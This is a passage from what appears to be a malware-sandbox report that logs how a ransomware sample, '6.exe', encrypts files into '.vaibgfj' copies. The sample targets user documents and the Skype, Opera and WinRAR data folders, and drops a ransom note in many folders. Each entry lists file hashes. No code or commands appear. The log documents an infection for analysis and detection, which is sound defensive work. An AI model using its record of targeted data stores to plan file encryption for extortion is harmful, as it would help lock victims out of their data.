SHA256: bdee1a880a9449684d6cb9473700b05153d8206881004689f88a339549d6b3af
3020
6.exe
C:\Users\admin\Documents\chapternetworks.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\takeeffort.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\strongma.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\postercurrency.png.vaibgfj
binary
MD5: 19d3a3fdf1721db8f8c73e17075b438d
SHA256: 5db83d4506f8d13d1e0b537c62375d25176ae9c68393b30f9a905521db861929
3020
6.exe
C:\Users\admin\Desktop\reportedgreater.png.vaibgfj
binary
MD5: 9755d33a3f5243703dd8c93eb546d90b
SHA256: b54cdcca663bc3ad595fe6b685c1276e87b827ded155a693a36a5087e025dc52
3020
6.exe
C:\Users\admin\Desktop\ratingfollow.jpg.vaibgfj
binary
MD5: d4f7fae049c09ff50591222230745d74
SHA256: c1bc8f1c4e63bcde3daa458560a24282d15f0322336da8f0fd4035703ab8a151
3020
6.exe
C:\Users\admin\Desktop\reportedgreater.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\ratingfollow.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\postercurrency.png
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\enterconsider.jpg.vaibgfj
binary
MD5: b30f1ab0d9d1629129ef72aacff24783
SHA256: b5a3850a64983960a8f32a7ad719ff9e113a692fecc92763a58bb7de318fc2f2
3020
6.exe
C:\Users\admin\Desktop\functiongeorge.rtf.vaibgfj
binary
MD5: 439ccc89e57fa8976b2b197e9fa61984
SHA256: 9ad2b034a1b463a7e9dedfbb1119a149c3b985a4c791d9afeea991410f74001d
3020
6.exe
C:\Users\admin\Desktop\jfund.rtf.vaibgfj
binary
MD5: a76ba235efc95fc3cb2f1ac261233b73
SHA256: d4fc7fd2b8051f5744c53df0f835d4ceae57d7f75d6e7e5b06e9245b406d1cde
3020
6.exe
C:\Users\admin\Desktop\functiongeorge.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\jfund.rtf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\airportroom.jpg.vaibgfj
binary
MD5: a5fea1234e74ad90d0f657449032d435
SHA256: 9e0f27523eb42b25f60c2556f66ada44fcc697e3e723dcd6e9331e1ba2110db1
3020
6.exe
C:\Users\admin\Desktop\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Desktop\airportroom.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Desktop\enterconsider.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\Contacts\admin.contact.vaibgfj
binary
MD5: 0e4fb1d891a4a919355b3be2559fa645
SHA256: 64cb282a222b2f8a193fcba494a44aaa7d2055ba1814577fe3a9c3b02a6101bf
3020
6.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\Contacts\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.vaibgfj
binary
MD5: bca64e33ee2af5f285ee1d32e5fbcd6c
SHA256: e3d130813e7c22ec081d943a39722b018bb7a6cb5fb3dd47ef35a72b54d5aa59
3020
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Sun\Java\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Sun\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.vaibgfj
binary
MD5: 1f9a70afee571b2fef9f9d777cd72fed
SHA256: d6a35a4f00357f027fe8ce8d6824673ef259f3f5a2d24e4554cc9216961e4873
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.vaibgfj
binary
MD5: 9066914c0437d8eb845bf402c760f65f
SHA256: 9d2a18b5e87932a76987e69cf0cfbe462097cee2bdf7b47f4f349efbda836d1f
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.vaibgfj
binary
MD5: 2c005bdfb24c3fab5177e7292bb52830
SHA256: 641cc8fd08ebbc4e12bb4a9de30a470d856247b36dcd00cd714589ab7a725d11
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.vaibgfj
binary
MD5: 64bb41d0d66f37a18ee46dfb8b9c1238
SHA256: 55d720914f22892bc1fa90fe7c951d2d08ca79ce129c1b01d1554e22178c7519
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.vaibgfj
binary
MD5: 7b38792027e1e9c0b904d5ea07592562
SHA256: 06fe2bc5d5a61e5dbafc62e955f7fccf56e7f6869cc340c58e126be47de7be1a
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.vaibgfj
binary
MD5: d6119c228902a9abbd0dc6583b2f8f2b
SHA256: bedb684370dfba59c780fc620888563bfa3e88ba19d4211e0086b65f2fcbd1a8
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.vaibgfj
binary
MD5: ce8c619f3b9d8425805d671ec3cf25a7
SHA256: 56d10352bd6f2c6662ba1cd3036743bf3f9c9a77982a034da7cb75680ccbc188
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.vaibgfj
binary
MD5: bb20ee50258bc402bc576292870fb08b
SHA256: 45cfd63ce0458442b7bf18183f8a36bf80aa661b49a326ea4835d3f4f8386005
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\logs\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.vaibgfj
binary
MD5: 40908ef73eeacb98665396cd43015802
SHA256: ce22029c5cc332937b79fb8b8619942356f76731809ac2a4e3f8595ac576b333
3020
6.exe
C:\Users\admin\AppData\Roaming\Skype\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.vaibgfj
binary
MD5: e160c49e06185d7bf1c248b6a86dd85a
SHA256: fa9194de9cff2c5ad997dd6d307adc5051c04fabe1628fd8384a3bcf3720b3f3
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.vaibgfj
binary
MD5: 3c4d97bb716c9b5b2e2aaa2971dc2637
SHA256: 2f1f10bd0766479ebf2a611c54c0bf78cd8a2648a055b566a8405fb292d30339
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.vaibgfj
binary
MD5: 1f958115266743a75c8fe908319112cf
SHA256: 7514dc985824281f8a7f14845e3d735d36c27a6097b62c46420dd2e1e84a12bf
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.vaibgfj
binary
MD5: bea5c26ce41837e00c3c63b07338b4d8
SHA256: c1053adf9e6c6133f58c98889b7b092d40dfc88503f3cd1b380d5b8c95e88331
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.vaibgfj
binary
MD5: eca4cfb7a42a55c03cad191000ab9461
SHA256: bad5c697d1081bb888a05fb8b001420675ab4b3187f6ffa95403c07dfafade24
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.vaibgfj
binary
MD5: 1695103463cd64264eb0cc8d7dd0bec4
SHA256: 5b3ed81f5793e4336480bd9986940dc8c662c09fd2b0ddc97a7598eccf60048e
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.vaibgfj
binary
MD5: f032e9f43b2501eedda1b87f943c3d1b
SHA256: 8744af699fe265592eb980f52420c7bb2e2ab0472d2b337198b2b9a5602b6663
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.vaibgfj
binary
MD5: 9c24a3216d4ec1fd04825b7865e222ef
SHA256: 5fb094595f08a7309568c681a5a1deb95861787574a36f62bcfc8c9d9c073d41
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.vaibgfj
binary
MD5: 8ec747fd2a553082b96d4e3381852545
SHA256: e16b8b8de4a6e33206377c540250ab6310d017bf326f2de3b253615e2f315bc7
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.vaibgfj
binary
MD5: 0d637f55e0a72ea69b99182b9dc19710
SHA256: 925dec8a8cf8d8435bc1abc7094f89080f54f994af7640e42d4e92807dab647a
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.vaibgfj
binary
MD5: 5698a00c5d3f01d9fe090a75a2e0f78e
SHA256: 7d00162aa3130ae3c354b36b1d548b095e48581b8016f52106c0b189780f1052
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.vaibgfj
binary
MD5: fb5909e43d83b1ce37206d0764eff21e
SHA256: 4f1b6c7f17a94b4c230c38f0823a18eb25e0328e90b1f0db46e32d72dee1f77d
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.vaibgfj
binary
MD5: bec92e89b040b9da1af76036212dcd44
SHA256: 71118b150661ba810e3808d78359c32562f7df730459a553ab4ff9c08e2cb609
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.vaibgfj
binary
MD5: 71b28d034c5b980fc994396559484864
SHA256: e0a2bbd8bacd669be8de17e7f16cdccd2f15c4c713f53171bf4eec2c64d0579f
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.vaibgfj
binary
MD5: 044c218681333ebba2f4d694f30e0930
SHA256: 9a50fc6c5dd5741509774392f2412029634a7ec5defb026752de0cef50c24c19
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.vaibgfj
binary
MD5: 96842b8cc6b9862c10acf7d4dc58e6c8
SHA256: e01c752728454bf8d5577565658332aede9ff52b63b40d8215d55b8ef6c7b016
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.vaibgfj
binary
MD5: b4714f92e4f821007b1afdb92319ef00
SHA256: 5269fbb04c440c15db956cedc7c9d48b394260f19ba99ebca711d9fed828f496
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.vaibgfj
binary
MD5: f32988f8991ad224c731302401e04ce9
SHA256: d24b6938ed4ea411272808b51178b1ec0f9a8688a2e67817e2af597d3387dd21
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.vaibgfj
binary
MD5: 2766a86c10cc9670bb79d1cf1fb4afaa
SHA256: 731b3c9e36f184a1135a98cb3c59e898ef6142b58d3f3470716f2764eb0532ac
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.vaibgfj
binary
MD5: 3eafda257981c92019984f1b02c5a853
SHA256: feb1e2358ad872866dc90bffd4502b1786a931c2e6cb614f58e766d1babb651a
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.vaibgfj
binary
MD5: dc4e1cbaed330827b5f76ef34647e18b
SHA256: e44646475354823e88a618ad4980822dad7c2a57bf3b76a1fe9a7848242f51e6
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.vaibgfj
binary
MD5: b73e7f5976d9864e4c365b2aa52281a4
SHA256: 038d62a1da38fad04fcb2025a6f16c1e4432ddd55c743c1cb446cb62762fa890
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.vaibgfj
binary
MD5: 16cee9e577c9007e8fa6d3c6f12a6ad7
SHA256: dbe2071d05b076d6d66849864cb4623c05e7696ed7efe709bd28f164d5d5c708
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.vaibgfj
binary
MD5: 809ec0bdf6a0202de1b0f9a142744eb5
SHA256: bf13ec058d396da1d4c0ce704a4683656d14c5ef41623b6c55a5e5eca1ab4330
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.vaibgfj
binary
MD5: 361929b888e0deea8572455db51725ab
SHA256: 0557fae782617bc081eac4791003235fad5bbb7a65815cece81cfdf6b9195b8e
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.vaibgfj
binary
MD5: 34a09f07f788f049c263cf4894c00b97
SHA256: 306465b7f1eca11ff4bd70dd048f85f6d077231c63f435d1169e6a1aa4877d88
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.vaibgfj
binary
MD5: f06660920816d67ce96ee4bdbe529b2f
SHA256: 4a7c5b82e1f0aec974695461d806e01ebd81d3328f89549a76cabd8d043ad71a
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.vaibgfj
binary
MD5: a907c2abf5a3c30fae486a9234c53dc5
SHA256: cdd93f4f28a16317c6dc09400a6c7c30c0b747e71a49f75276e95d8faf5cad70
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.vaibgfj
binary
MD5: 0ef0d6e6cc91206bf0d05fd4c2e1d1fb
SHA256: ef40948f6e24d8313df8d4a3d4630bd06fa51a5eb2b9797876b39c29296133c1
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.vaibgfj
binary
MD5: 0e96ea3afce0a22cbf44caa8168c8dcc
SHA256: e9f0c987c4e7094f11f7638f1499d395f974e72c0c9427529855dced892156ab
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.vaibgfj
binary
MD5: 0d0ff94df304996488b82071aa35bb9c
SHA256: 9af8ba18c4bf0867c9c2c904258cc72e996c3459bca9850562c09221e825fc6c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.vaibgfj
binary
MD5: e4418e8ad0485d6544f9e4bca5c8785b
SHA256: 415e42d7b209894a1a77672698ce19139dea3d743b0a1f6e4a50a984a7f8a7d5
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.vaibgfj
binary
MD5: 3d28db90ddaab458d0a51879d32f7661
SHA256: 8adf20b3477971b11514054584634d0b6f8e1d3e2366e41580fbb7a2e43fd13a
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.vaibgfj
binary
MD5: 77bc7ba65eeefe9a7849985194bef8f8
SHA256: 8a2c12cb6da08d8fc6b828b027d95903c71067629ad6d170ba52837d5e9395ac
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.vaibgfj
binary
MD5: f9fd5cb2aa7f751f90f01d1372cb1276
SHA256: 54f9fa401390a8b2ed9413052f222869640289f01a1cf9367c322e8b2f9cee92
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.vaibgfj
binary
MD5: e176e45ce15ff456981845e6dfe33735
SHA256: 911f601a843f97a569a1e2f83c57f7a8e34c5dd473d8966cdc60a3a858702c90
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.vaibgfj
binary
MD5: 4ccb2de544f80c1117a42d062620527f
SHA256: 51c28424f373101e4a8e4f453f7ddddb937b5bdf82848da768dff945ce174649
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.vaibgfj
binary
MD5: 1b8a3a098d5c5470371c1b14ed5fad7f
SHA256: 6693759efad321f9c21384b3c93c1802ec83abe7c1ef98d1ad052501d2d73ede
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Opera\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blu